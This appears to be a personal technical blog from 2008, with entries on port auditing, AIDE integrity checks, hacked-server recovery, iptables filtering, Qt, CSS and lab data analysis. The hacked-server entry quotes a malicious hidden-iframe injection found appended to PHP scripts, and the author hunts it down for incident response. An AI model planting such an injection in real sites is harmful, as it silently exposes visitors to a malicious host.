Netstat sometimes pauses during output. This is normal; it tries to resolve the addresses into human-readable host names*. If you don't want this, use the -n option.

Example output from my laptop which runs Fedora 8 (I have removed the columns Foreign Address and State for the sake of brevity):

 Active Internet connections (only servers)
 Proto Recv-Q Send-Q Local Address                PID/Program name   
 tcp        0      0 telislt.sron.nl:irdmi        2381/nasd           
 tcp        0      0 *:55428                      1965/rpc.statd      
 tcp        0      0 telislt.sron.:commplex-main  6573/ssh            
 tcp        0      0 *:mysql                      2307/mysqld         
 tcp        0      0 *:sunrpc                     1945/rpcbind        
 tcp        0      0 192.168.122.1:domain         2533/dnsmasq        
 tcp        0      0 telislt.sron.nl:privoxy      3581/ssh            
 tcp        0      0 telislt.sron.nl:ipp          2553/cupsd          
 tcp        0      0 telislt.sron.nl:smtp         2352/sendmail: acce 
 tcp        0      0 *:8730                       6030/skype          
 tcp        0      0 *:http                       2371/httpd          
 tcp        0      0 localhost6.localdom:privoxy  3581/ssh            
 tcp        0      0 *:ssh                        2205/sshd

Whenever there is an asterisk (star) instead of a host name, netstat tells us that the port is listened to on ALL interfaces, not only the local interface but also any present interfaces connected to the outside world. These are the ones we want to hunt down.
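As a cross-check on the netstat output, you can probe a port with a plain TCP connect. Here is a small Python sketch; the function name port_open is made up, and the demonstration opens its own listener so it's self-contained:

```python
import socket

def port_open(host, port, timeout=1.0):
    """Return True if a TCP connect to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# Self-contained demonstration: open our own listener on a free port,
# then verify the connect test sees it.
listener = socket.socket()
listener.bind(("127.0.0.1", 0))      # port 0: the kernel picks a free port
listener.listen(1)
port = listener.getsockname()[1]
print(port_open("127.0.0.1", port))  # True
listener.close()
```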

Now we know the program names, we can find out more about them. We'll take for instance the rpc.statd program. First we locate the complete path of this process:

 $ whereis rpc.statd
 rpc: /sbin/rpc.statd /usr/sbin/rpc.svcgssd /usr/sbin/rpc.idmapd 
 /usr/sbin/rpc.mountd /usr/sbin/rpc.rquotad /usr/sbin/rpc.gssd 
 /usr/sbin/rpc.nfsd /etc/rpc /usr/include/rpc

Whereis does a search and finds /sbin/rpc.statd. On RPM-based systems, we can request more information about the owning package:

 $ rpm -qif /sbin/rpc.statd
 ....
 The nfs-utils package provides a daemon for the kernel NFS server and
 related tools, which provides a much higher level of performance than the
 traditional Linux NFS server used by most users.

Now we know whether we want this package or not. If not, just remove it and the port will be closed. If we need the functionality, does it need to listen to the outside network? If not, we would typically Read The Fine Manual to see whether we can configure this package to listen locally.

Repeating this exercise for each line in the netstat output will tighten a server's security.

  • Just like addresses are resolved into host names, the port numbers are resolved into services using the /etc/services file.

2008-05-22 Configuring AIDE

Today I installed AIDE on a CentOS 5 server. This package is an alternative to the traditional Tripwire. The installation is a cinch with yum:

 $ sudo yum -y install aide

The first thing I ran into was that this server had SELinux disabled, so I had to make the following changes to the supplied configuration file /etc/aide.conf.

I added the following lines close to the top; these are copies of the default rules, but without the SELinux checks (which would otherwise generate errors):

 R =            p+i+n+u+g+s+m+c+acl+xattrs+md5
 L =            p+i+n+u+g+acl+xattrs
 > =            p+u+g+i+n+S+acl+xattrs
 DIR = p+i+n+u+g+acl+xattrs
 PERMS = p+i+u+g+acl

Then as root, initialize the database:

 $ sudo aide --init
 AIDE, version 0.13.1
 ### AIDE database at /var/lib/aide/aide.db.new.gz initialized.

Copy the new database, to make it the baseline to check against:

 $ sudo cp /var/lib/aide/aide.db.new.gz /var/lib/aide/aide.db.gz 

Then create a file named aidecheck in /etc/cron.daily with the following contents:

 #!/bin/sh
 /bin/nice -n 18 /usr/sbin/aide --update | \
    /bin/mail -s "AIDE check on host  `hostname`" root
 cp /var/lib/aide/aide.db.new.gz /var/lib/aide/aide.db.gz

Be sure to make the file executable:

 $ sudo chmod 755 /etc/cron.daily/aidecheck

2008-05-21 Code review

I'm doing a code review for our partner in the current project. In a recent
integration test, we found a problem.

An overview of the equipment: we're talking about software running on a PC104 device (basically a small PC) running Linux. This PC104 has a bunch of serial ports.

They have a custom I/O card; let's call it Raba1. This card has two serial ports. The software reads the incoming data from port TTY2, thinks about it and then sends the appropriate commands out on the TTY1 port. The problem is that sometimes the software just halts for a minute, doing nothing while data is actually coming in.

One thing that can go wrong here has its root in the structure of the software. It basically runs in a big loop, at the start of which a select() statement monitors the two serial ports and the internal command channel for input.
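The loop structure can be sketched in Python, with pipes standing in for the serial ports and the command channel (the real TTY devices and the Raba1 card are obviously not available here):

```python
import os
import select

# Pipes stand in for serial port TTY2 and the internal command channel.
tty2_r, tty2_w = os.pipe()
cmd_r, cmd_w = os.pipe()

os.write(tty2_w, b"sensor data\n")      # data arrives on 'TTY2'
os.write(cmd_w, b"internal command\n")  # and on the command channel

handled = []
for _ in range(2):
    # select() blocks until at least one channel has input (or times out)
    readable, _w, _x = select.select([tty2_r, cmd_r], [], [], 0.1)
    for fd in readable:
        handled.append((fd, os.read(fd, 4096)))
        # If handling one channel is slow, data on the other channel waits
        # in the kernel buffer; it's only lost if that buffer overflows,
        # which is exactly what the serial driver statistics would show.

print(len(handled))  # 2: both channels were picked up
```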

A theory is that it's missing data because the loop isn't fast enough. It
could happen that we send commands to the software through the internal
command channel and while these are parsed and handled, other data comes in
through port TTY2.

What makes this unlikely is that such buffer overflows can be detected by the Linux serial device driver. These statistics were watched and were not found to correlate with the pauses.

2008-05-06 Recovering from a hacked server

A friend of mine had a problem with a server on which a particular PHP script kept being modified to include an iframe that shouldn't be there.

I took the following steps to see what was happening. This can be used as a checklist.

  • Checked /etc/passwd for strange accounts
  • Did a 'ps -ef' to see what processes were running
  • Checked /var/log/secure for strange logins through SSH
  • Checked for other services running, for example FTP. Checked the logins on that as well.
  • Checked /tmp to see whether any executables were present
  • Checked Apache's default access logs
  • Checked Apache's access logs for each virtual host, paying attention to POST requests
  • Checked world-writable and tmp directories in user home directories
  • Checked what's in the crontabs
  • Checked the OS version. In this case, found it by doing
  # cat /etc/redhat-release
  CentOS release 4.6

I found nothing weird in Apache's log files, no funny scripts et cetera.

In a bunch of PHP scripts, the following code was appended at the end:

 echo '<iframe src="http://apartment-mall.cn/ind.php" width="1" height="1"
 alt="YTREWQhej2Htyu" style="visibility:hidden;position:absolute"></iframe>';

Googling for this turned up that it's a pretty common attack. Articles suggest it might be a compromised FTP account. The timestamps of the changed files suggest it was done in one fell swoop.
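To find every affected script in one go, something like the following Python sketch works. The walk-and-grep approach and the marker string come from the incident above; the function name is made up:

```python
import os

# The tell-tale string from the injected iframe above.
MARKER = "YTREWQhej2Htyu"

def find_infected(webroot):
    """Walk webroot and return every .php file containing the marker."""
    hits = []
    for dirpath, _dirs, filenames in os.walk(webroot):
        for name in filenames:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, errors="replace") as fh:
                if MARKER in fh.read():
                    hits.append(path)
    return sorted(hits)
```

Comparing the mtimes of the reported files (os.path.getmtime) then confirms whether they were all changed in one sweep.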

To see what FTP servers are running:

  # ps -ef

In case I missed anything, see what ports are listened to:

  # netstat --listen --ip -T -p

The -T option won't cut off long addresses and the -p option will print the process that's doing the listening.

Found out in /var/log/messages that a script logged in around the same time that the files were modified.

The conclusion was to do a full OS reinstall, followed by a thorough tightening-up and a code review.

2008-05-06 CSS box model

Lately I've been lurking on the #CSS channel on the Freenode IRC server and I've noticed a lot of questions that basically boil down to a developer not understanding the CSS box model.

The most basic things to remember are, in my opinion, the following.

There are block and inline elements. In simple terms, block elements get a newline after them. Elements like div and p are block elements. Inline elements usually reside in a block element; think of them as stuff you'd put in a paragraph. Anchors and markup like em are all inline elements.

Then there is floating. If you let elements float left or right, they'll "float" to the top of the containing element. Floating elements must have a width applied to them. Multiple floating elements will line up nicely beside each other if there's room.

When you've got a problem, think about the above two things and see if you can figure out what's happening. Don't just ask in the #css channel "what's happening", try to come up with a theory and state it. It'll help you a great deal more.

Also read Mike Hall's primer on CSS Positioning.

2008-04-16 Qt database widgets part 2

Last time I got away without creating a custom QItemDelegate, but not this time. I need a radio button for a database column of which all rows must contain 0 (zero), except one row which must be set to 1 (one). This database column designates the default or current setting.

Presenting the user with a 1 or 0 isn't terribly friendly. Since a QItemDelegate is about both presenting and editing, this is an obvious candidate to be subclassed.

A nice example is the Spin Box Delegate, however, this example creates an editor but not a custom paint method for the normal viewing of the item.

2008-04-16 Qt database widgets

I've been playing with a couple of Qt classes to get an easy-to-use SQL user interface. The combo QTableView and QSqlTableModel seemed very nice. Using the Designer, I could click an interface together and voilĂ , a nice grid where the user can edit the database.

There were a couple of hiccups. If fields were NULL in the database, they could be filled in but never set back to NULL. After reading and trying out lots of stuff, I found the following classes are involved:

QTableView Provides the general table widget on the screen
QItemDelegate Provides view/edit functions for specific cell types in the table widget on the screen
QSqlTableModel This class provides an easy-to-use API for a database table
QAbstractProxyModel A class that can be stuck over QSqlTableModel to transform, sort or filter data when it comes in or goes out of the QSqlTableModel

You have to think about what functions exactly you want to change. If it's the overall interface, think about the QTableView. In my case, I wanted to enable the user to set fields to NULL. The normal QItemDelegate doesn't allow this.

In the end I avoided the whole issue by using one type field (which can contain 'string', 'integer', 'double' et cetera).

2008-04-15 Opera schade

Always fun, browser wars. Especially in the office.

opera schade.png

For those not in-the-know: the markup is typical for the warnings on packages of cigarettes in the Netherlands. Translation: "Opera causes severe harm to you and others around you".

Stuck on an Opera promotional poster in the office.

2008-03-31 Filtering on packet size

I was asked recently how to filter UDP packets that don't have any contents. The reason was that such packets were used as a denial of service against a specific game server. This bug had been acknowledged by the developers of the server, but it was only fixed in a later version and wouldn't be backported to the older one.

iptables can filter on this as follows:

  $ sudo iptables -A INPUT -p udp --dport 6500 -m length --length 28 -j REJECT

Why length 28? It's UDP over IPv4: UDP has a fixed 8-byte header, and the minimum IPv4 header is 20 bytes, so an empty datagram adds up to 28 bytes. (IPv4 headers can be longer when options are present, hence the variable header size.) Anyway, I've tested the above using netcat:

Start service listening to port 6500 on machine 1:

  $ nc -l -u -p 6500

Open a new terminal on machine 1 and start a traffic dump:

  $ sudo tcpdump -X -vv "port 6500"

Set up a client on machine 2, which sends all input from stdin to machine 1:

  $ nc -u machine1 6500

Now type some text, then press enter. The server will output whatever you typed. Now just press enter on its own: you're sending a UDP packet with the newline \n as its only content. tcpdump should display:

 16:20:43.898341 IP (tos 0x0, ttl  64, id 65431, offset 0, flags [DF],
 proto: UDP (17), length: 29) machine1.6500 > machine2.36237: [bad udp
 cksum 26d!] UDP, length 1
        0x0000:  4500 001d ff97 4000 4011 ca51 ac10 8cb7  E.....@.@..Q....
        0x0010:  ac10 8c0e 1964 8d8d 0009 7101 0a         .....d....q..

Length 29 thus means: subtract the single newline byte and you have an empty UDP packet at length 28.

If that length doesn't work, you can play with ranges. For example "--length
20:30" means: reject everything between 20 and 30 bytes length.
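The length arithmetic can also be verified without netcat, using a pair of local UDP sockets in Python. The 20 and 8 below are the minimum IPv4 header and the fixed UDP header sizes:

```python
import socket

# An empty UDP payload over IPv4 gives 20 (minimum IP header) + 8 (UDP
# header) = 28 bytes on the wire; the 'just press enter' packet adds one.
server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server.bind(("127.0.0.1", 0))
port = server.getsockname()[1]

client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client.sendto(b"\n", ("127.0.0.1", port))     # the newline-only packet
payload, _addr = server.recvfrom(4096)

IP_HEADER, UDP_HEADER = 20, 8
print(IP_HEADER + UDP_HEADER + len(payload))  # 29, matching the tcpdump output
client.close()
server.close()
```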

2008-02-07 the WTF count

Inspired by the comic WTFs per minute, we thought that besides strings like TODO and FIXME, we'd 'really' like vim to highlight the string WTF.

First, you need to locate the syntax file:

 $ locate syntax/c.vim
 /usr/share/vim/vim70/syntax/c.vim

If you're root, just edit this file, search for the line:

 syn keyword       cTodo       contained TODO FIXME XXX

and add WTF at the end of the line.

If you're a mere mortal user, copy this file to your home directory and give it a name such as myc.vim. Then edit the file as described above and add the following lines to your $HOME/.vimrc file:

 au BufRead,BufNewFile *.c set filetype=myc
 au! Syntax myc source $HOME/myc.vim

2008-01-30 Fiske scan analysis

I've written an analysis routine to see how the results of a particular Fiske "scan" hold up. Such a scan means: set a particular FFO current and an FFO control line current, then stepwise increment the latter while measuring the FFO voltage. A scan thus results in a bunch of voltages. In such a scan, certain areas will never contain values -- search this blog for Fiske steps for more information.

I wanted to visually check the analysis of the routine. A scan can have a lot of outcomes. Say we want to find value 0.863. We'd then do a scan where we're aiming for a resulting voltage between 0.858 and 0.868. Some possible situations that could come out:

 1)    ---*-*-*-*-*-*-*-*-*--   Very nice step found
 2)    -*-*---------*-*-*-*-*   Found two steps, at the right is biggest
 3)    -*-*-*-*-*--------*-*-   Found two steps, at the left is biggest
 4)    **-*---------------*-*   Found two steps but they're both too small
 5)    ----------------------   No (or not enough) points found at all
 6)    --*-*-*-*-*-----------   One step found, but it's not nicely balanced

I've retrieved some test values and the scan results (without the FFO plot behind it) look as follows. The X axis displays the FFO voltage in mV. Note that the Y axis is a simple counter in this case, and is meaningless. It's also in reverse: the lower the value on the Y axis, the more recent the results on the X axis. The black line is the value that we're aiming at.

fiske scan 1.png

The first couple of lines (starting at the top) show the results of the setup phase of the Fiske macro. These can be ignored; they're not used for analysis.

Let's zoom in on the first lines (i.e. where the Y axis shows '42').

fiske scan 1 zoomed.png

We're looking for a line that's nicely centered around value 0.863 mV.

We can say the following things about the first bunch of lines below the setup lines:

  • They all contain enough points for us to analyze them
  • They're all right in the middle between two "rows of points".
    Since we need a row with a bunch of points centered around our value of 0.863, these rows (42 down to 28) are all useless.
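For illustration, the criteria above could look something like this in Python. This is a sketch only: the thresholds, window and message strings are modelled on the log output in this entry, not taken from the real routine.

```python
def classify_scan(voltages, target, min_points=8, window=0.005):
    """Classify one scan line against the target FFO voltage (in mV)."""
    points = [v for v in voltages if abs(v - target) <= window]
    if len(points) < min_points:
        return "Last scan contained only %d points" % len(points)
    below = sum(1 for v in points if v < target)
    above = len(points) - below
    # A good step needs points on both sides of the target, in roughly
    # equal numbers; otherwise the result set is skewed.
    if min(below, above) < max(below, above) / 2:
        return "Last result had a skewed result set"
    return "Good result found"
```

The balance test at the end stands in for the coverage check discussed below: a row that doesn't straddle the target value should never count as a good result.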

Now what does the analysis routine say?

 Line 46 gives result: Last scan contained only 7 points
 Line 45 gives result: Last scan contained only 4 points
 Line 44 gives result: Last scan contained only 4 points
 Line 43 gives result: Last scan contained only 4 points
 Line 42 gives result: Last scan contained only 4 points
 Line 41 gives result: Last result had a skewed result set
 Line 40 gives result: Last result had a skewed result set
 Line 39 gives result: Last result had a skewed result set
 Line 38 gives result: Last result had a skewed result set
 Line 37 gives result: Last result had a skewed result set
 Line 36 gives result: Last result had a skewed result set
 Line 35 gives result: Last result had a skewed result set
 Line 34 gives result: Good result found
 Line 33 gives result: Good result found
 Line 32 gives result: Last scan contained only 6 points
 Line 31 gives result: Last scan contained only 4 points
 Line 30 gives result: Last scan contained only 6 points
 Line 29 gives result: Last result had a skewed result set
 Line 28 gives result: Last result had a skewed result set

Obviously the procedure thinks that lines 34 and 33 have a pretty good result, which is not the case.

After adapting the analysis routine, the following output is shown:

 Line 37 gives result: Last result had a skewed result set
 Line 36 gives result: Last result had a skewed result set
 Line 35 gives result: Last result had a skewed result set
 Line 34 gives result: Last result had a skewed result set
 Line 33 gives result: Last result had a skewed result set
 Line 32 gives result: Last scan contained only 6 points
 Line 31 gives result: Last scan contained only 4 points
 Line 30 gives result: Last scan contained only 6 points
 Line 29 gives result: Last result had a skewed result set
 Line 28 gives result: Last result had a skewed result set
 Line 27 gives result: Last result had a skewed result set
 Line 26 gives result: Last result had a skewed result set
 Line 25 gives result: Last result had a skewed result set
 Line 24 gives result: Last result had a skewed result set
 Line 23 gives result: Good result found
 Line 22 gives result: Good result found
 Line 21 gives result: Last result had a skewed result set
 Line 20 gives result: Last result had a skewed result set
 Line 19 gives result: Last result had a skewed result set
 Line 18 gives result: Last result had a skewed result set

Still not OK. What's wrong here is that the subroutine for a skewed result set runs first; after that succeeds, a detection still needs to be added that checks whether a set actually covers the target X value.

2008-01-02 Fiske results

Finally some visual results from the Fiske step routine.

fiske results1.png

This image shows the FFO as it's always drawn: bias current on the Y axis and resulting measured voltage on the X axis. The color displayed is the voltage on the SIS junction.

The blue lines are the scans as executed by the Fiske macro. As a reminder, such a macro is a list of commands for the FPGA on the electronics boards. The Fiske macro keeps the FFO bias at a single value, while the FFO control line is stepped up. As can be seen, the control isn't very well regulated; the blue lines shift a little at the left and right edges. Well, actually they shift more than a 'little'. The left is completely off :-)

To fix this, the starting point (the leftmost point) of each scan should be in line with the previous scan. The first point that's just over Vstart (see previous entries) is probably a good candidate.

What's happening now is that the procedure tries to find a good point in the scan part of the macro -- when actually a good point could reside in the find up part of the macro. So this problem is fixed by searching in that first find up part as well.

Note that currently, an analysis is run on each line. Normally the scan would be stopped once the analysis was positive; this is the case when the blue line sees that it's right inside a cloud of points (reading out the PLL IF voltage reports 0.4 V or higher). However, my Russian colleague gave the advice to let it run somewhat longer and see whether the analysis can be improved.